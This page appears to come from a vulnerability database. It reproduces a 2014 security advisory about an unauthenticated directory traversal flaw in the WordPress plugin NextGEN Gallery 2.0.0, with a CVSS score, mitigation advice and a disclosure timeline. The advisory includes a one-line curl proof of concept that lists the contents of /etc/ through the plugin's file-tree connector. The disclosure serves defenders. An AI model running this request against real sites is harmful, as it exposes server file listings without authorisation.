Lucene search
K

NextGEN Gallery 2.0.0 Directory Traversal

🗓️ 19 Feb 2014 00:00:00Reported by Tom AdamsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 61 Views

NextGEN Gallery 2.0.0 Directory Traversal vulnerability reported and fixe

Code
`https://security.dxw.com/advisories/directory-traversal-in-nextgen-gallery-2-0-0/  
> Details  
> ================  
> Software: NextGEN Gallery  
> Version: 2.0.0  
> Homepage: http://wordpress.org/plugins/nextgen-gallery/  
> CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)  
>  
>  
> Description  
> ================  
> Directory traversal in NextGEN Gallery 2.0.0  
>  
> Vulnerability  
> ================  
> An unauthenticated POST request to a particular URI with a particular   
> parameter lists the contents of arbitrary directories.  
>  
> Proof of concept  
> ================  
> curl -i -d 'dir=/etc/'   
> http://localhost/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php  
>  
> Mitigations  
> ================  
> This issue is reported to be fixed as of version 2.0.7. Prior versions   
> should be updated immediately.  
>  
> Timeline  
> ================  
> 2013-08-09: Reported to vendor  
> 2013-08-09: Vendor reports fixed  
> 2014-02-18: Published  
>  
> Discovered by:  
> ================  
> Tom Adams  
  
  
--   
Harry Metcalfe  
07790 559 876  
@harrym  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation